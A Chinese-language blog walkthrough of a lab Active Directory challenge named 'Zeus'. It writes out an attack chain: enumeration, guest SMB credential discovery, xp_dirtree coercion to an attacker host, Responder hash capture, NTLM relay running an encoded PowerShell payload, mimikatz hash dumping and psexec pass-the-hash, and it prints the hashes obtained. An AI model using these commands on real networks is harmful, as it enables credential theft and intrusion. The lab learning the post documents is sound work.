Challenge 7 - Zeus(0)
Challenge 7 - Zeus(0)
近期又推出了新的 LAB Challenge 7 - Zeus 宙斯,只有三台看來是個 AD 題組
且三台同網段,研判是模擬考試環境三台都對外的 AD 題組
三台都是 Windows
三台都先 Rustscan 掃掃看,└─$ rustscan -a 192.168.116.158 --scripts none --ulimit 5000 | tee rustscan
159 看來沒有甚麼
160 看來也沒有甚麼
三台的 snmp 也都沒有效
nmap LDAP Search,└─$ sudo nmap -n -sV -Pn --script ldap-search.nse 192.168.116.158 | tee nmap-ldap-search
網域名稱 : zeus.corp
LDAP 物件查詢沒有結果,└─$ ldapsearch -v -x -b "DC=zeus,DC=corp" -H "ldap://192.168.116.158" "(objectclass=*)"
使用者枚舉看看,└─$ ./kerbrute_linux_amd64 userenum --dc 192.168.116.158 -d zeus.corp -o kerbrute-user-enum xato-net-10-million-usernames.txt
SMB 枚舉看看,使用匿名都無法存取,但是帶入 zeus\guest 可以在 .159 發現有個特殊的分享路徑 SQL
smb 連線該資料夾,└─$ smbclient \\\\192.168.116.159\\SQL -U 'zeus\guest'
當中有一個檔案 connection.sql,抓回來到 kali
查看檔案發現一組帳號密碼 zeus.corp\db_user:Password123!
crackmapexec 測試一下是一組有效的憑證,└─$ crackmapexec smb 192.168.116.158-160 -u db_user -p 'Password123!' -d zeus.corp
跑一下 bloodhound,查找 Domain Admin 僅有一個帳號 administrator
Kerberoastable 帳號有兩個,KRBTGT、svc_mssql$
SPN 資訊 MSSQLSvc/DC01.zeus.corp:1433、MSSQLSvc/DC01.zeus.corp
先用 db_user 登入到 MSSQL,└─$ impacket-mssqlclient 'db_user':'Password123!'@192.168.116.158 -windows-auth
測試 EXECUTE sp_configure 'show advanced options', 1 告知沒有權限
查看相關 DB 沒有有用的資訊,後續使用 xp_dirtree \\192.168.45.181\share; 去存取 kali 的
SMB 服務,然後在 kali 啟動 responder 監聽,└─$ sudo responder -I tun0 --verbose
發現送過來的帳號是 zeus\svc_mssql$ 的 HASH
將 HASH 存好
hashcat 開始破解,└─$ hashcat -m 5600 svc_mssql\$.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
改使用 Relaying Net-NTLMv2
編輯 Powershell oneliner,然後啟用 impacket-ntlmrelayx
└─PS> impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.116.159 -c "powershell -enc JABjA............................GUAKAApAA=="
MSSQL 指令再跑一次 xp_dirtree \\192.168.45.181\share;
Responder 進來了然後直接 relay 出去到我們的目標 .159
拿下 .159 了
.159 只有 proof.txt
執行 mimikatz.exe 獲取 administrator NTLM Hash a1fcb4118dfcbf52a53d6299aab57055
測試 impacket-psexec 可以直接登入,└─$ impacket-psexec -hashes :a1fcb4118dfcbf52a53d6299aab57055 administrator@192.168.116.159
獲得另一個帳號 o.foller 的 NTLM HASH decca5b9babc228de4cedeb29a6b9abf
o.foller 進不了 .159 但是 .160 可以進入└─$ impacket-psexec -hashes :decca5b9babc228de4cedeb29a6b9abf 'o.foller'@192.168.116.160
whoami /groups 看了一下是 160 的 administrators 群組成員
一樣沒有 local.txt 僅有 proof.txt
160 mimikatz.exe 獲得 administrator HASH 97db5c87465431b9091d47a58fe76483
留言
張貼留言